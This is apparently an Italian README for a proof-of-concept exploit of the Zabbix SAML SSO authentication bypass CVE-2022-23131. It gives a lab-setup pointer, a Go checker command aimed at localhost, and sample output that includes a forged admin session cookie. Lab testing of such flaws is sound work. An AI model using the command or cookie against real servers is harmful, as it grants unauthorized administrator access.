
Exploit proof-of-concept per CVE-2022-23131, una vulnerabilità di bypass dell'autenticazione SAML SSO di Zabbix. Include configurazione dell'ambiente e un checker basato su Go per verificare l'esposizione del target.
Ambiente e Poc di CVE-2022-23131
Puoi creare un Zabbix con SAML SSO seguendo i passaggi in Ambiente Zabbix per CVE-2022-23131.
Il Poc è stato modificato da jweny
Utilizzo:
go run poc.go check -t http://localhost:8080 -u Admin
[INFO] 2022/02/24 19:49 vul exist! target: http://localhost:8080, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiYmYyMzAxMWU1YWMyOWE1MjFlN2E1ZDZjMTAwZDQ2NjAiLCJzaWduIjoiaytKblhjVjlhQmJRa3NJc21oMVRwVEhrMGFDSTJOYkM1VGNTU1doczQ3YVIrNmpWZ1BKOGw5cWZhZlRmcjA3VGVKalNZcW5kZWRPWEtleklmS0Fjb3c9PSJ9